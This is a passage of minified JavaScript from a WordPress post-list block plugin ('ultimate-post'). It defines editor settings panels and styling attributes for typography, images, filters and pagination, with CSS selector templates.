More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:0,data:{type:"range",key:"largeimgSpacing",label:__("Large Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{position:1,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Large Image Height","ultimate-post")}},{position:2,data:{type:"range",key:"spaceLargeItem",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Large Item Space","ultimate-post")}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},39220:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},largeHeight:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image img { width: 100%; object-fit: cover; height: {{largeHeight}}; }"}]},spaceLargeItem:{type:"object",default:{lg:"60",xs:"25",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-item:first-child { margin-bottom: {{spaceLargeItem}};}"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"30",unit:"px"},transform:"",decoration:"none",family:"",weight:"500"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:15,unit:"px"},xs:{top:0,bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLgPadding:{type:"object",default:{lg:{top:10,bottom:15,unit:"px"},xs:{top:"0",bottom:10,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title { padding:{{titleLgPadding}}; }"}]},titleLength:{type:"string",default:0},mobileImageTop:{type:"boolean",default:!1,style:[{selector:"@media (max-width: 768px) { {{ULTP}} .ultp-block-media .ultp-block-content-wrap { display: block;} }"}]},imgFlip:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"!=",value:["layout2","layout3"]}],selector:"{{ULTP}} .ultp-block-content-true .ultp-block-media, \n          {{ULTP}} .ultp-block-content-1 .ultp-block-media { flex-direction: row-reverse; }"}]},imgCrop:{type:"string",default:"full",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",depends:[{key:"showImage",condition:"==",value:!0}]},imgWidth:{type:"object",default:{lg:"40",ulg:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; } \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { height:fit-content; } \n          {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image img { height:{{imgHeight}}; }"}]},imageScale:{type:"string",default:"cover",style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { object-fit:{{imageScale}}; }"}]},imgAnimation:{type:"string",default:"opacity"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-media .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-image"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-wrap { overflow:visible } \n          {{ULTP}} .ultp-block-item:hover .ultp-block-image"}]},imgSpacing:{type:"object",default:{lg:"40",xs:"25"},style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-right: 0; margin-left: {{imgSpacing}}px; }"},{depends:[{key:"showImage",condition:"==",value:!0},{key:"imgFlip",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: {{imgSpacing}}px; } \n          .rtl {{ULTP}} .ultp-block-item:not(:first-child) .ultp-block-image { margin-left: 0; margin-right: {{imgSpacing}}px; }"}]},largeimgSpacing:{type:"object",default:{lg:"15"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-image { margin-bottom: {{largeimgSpacing}}px; }"}]},imgOverlay:{type:"boolean",default:!1},imgOverlayType:{type:"string",default:"default",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaAuthor","metaDate","metaRead"]'},showSmallCat:{type:"boolean",default:!0},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!0},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},fullExcerptLg:{type:"boolean",default:!1},excerptLimit:{type:"string",default:40,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptLimitLg:{type:"string",default:70,style:[{depends:[{key:"fullExcerptLg",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:21,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n          {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:0,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!0},varticalAlign:{type:"string",default:"middle",style:[{depends:[{key:"varticalAlign",condition:"==",value:"top"}],selector:"{{ULTP}} .ultp-block-content-top .ultp-block-content { -ms-flex-item-align: flex-start;-ms-grid-row-align: flex-start;align-self: flex-start; }"},{depends:[{key:"varticalAlign",condition:"==",value:"middle"}],selector:"{{ULTP}} .ultp-block-content-middle .ultp-block-content { -ms-flex-item-align: center;-ms-grid-row-align: center;align-self: center; }"},{depends:[{key:"varticalAlign",condition:"==",value:"bottom"}],selector:"{{ULTP}} .ultp-block-content-bottom .ultp-block-content { -ms-flex-item-align: flex-end;-ms-grid-row-align: flex-end;align-self: flex-end; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta { justify-content: start; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a { display:flex; flex-direction:row-reverse; justify-content:flex-end; align-items:center; }"}]},contentWrapBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-content-wrap { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover { border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-content-wrap:hover"}]},contentWrapInnerPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content { padding: {{contentWrapInnerPadding}}; }"}]},contentWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-wrap { padding: {{contentWrapPadding}}; }"}]},counterTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"20",unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterColor:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { color:{{counterColor}}; }"}]},counterBgColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_2_color)"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterWidth:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { width:{{counterWidth}}px; }"}]},counterHeight:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { height:{{counterHeight}}px; }"}]},counterBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"var(--postx_preset_Base_3_color)",type:"solid"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before"}]},counterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["layout3","layout4"]}],selector:"{{ULTP}} .ultp-layout3 .ultp-block-item:first-child .ultp-block-content::before, \n          {{ULTP}} .ultp-layout4 .ultp-block-item::before, \n          {{ULTP}} .ultp-layout3 .ultp-block-content::before { border-radius:{{counterRadius}}; }"}]},separatorShow:{type:"boolean",default:!0},septColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-color:{{septColor}}; }"}]},septStyle:{type:"string",default:"dashed",style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-style:{{septStyle}}; }"}]},septSize:{type:"string",default:{lg:"1"},style:[{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:not(:first-child) { border-bottom-width: {{septSize}}px; }"}]},septSpace:{type:"object",default:{lg:"30"},style:[{selector:"{{ULTP}} .ultp-block-item:not(:first-child) { padding-bottom: {{septSpace}}px; } \n          {{ULTP}} .ultp-block-item:not(:first-child) { margin-bottom: {{septSpace}}px; }"}]},headingText:{type:"string",default:"Post List #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)s",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["advFilter","heading","advanceAttr","pagination","video","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"pagiAlign",default:{lg:"left"}},{key:"vidIconPosition",default:"center"},{key:"iconSize",default:{lg:"80",sm:"50",xs:"50",unit:"px"}},{key:"metaTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:20,unit:"px"},transform:"capitalize",weight:"500",decoration:"none",family:""}},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaMargin",default:{lg:{bottom:"15",unit:"px"},xs:{bottom:"5",unit:"px"}}},{key:"metaPadding",default:{lg:{top:"0",bottom:"0",unit:"px"}}},{key:"catLineColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catTypo",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},spacing:{lg:0,unit:"px"},transform:"",weight:"400",decoration:"none",family:""}},{key:"catColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Contrast_2_color)"},{key:"catBgHoverColor",default:"var(--postx_preset_Base_2_color)"},{key:"catSacing",default:{lg:{top:0,bottom:0,left:0,righ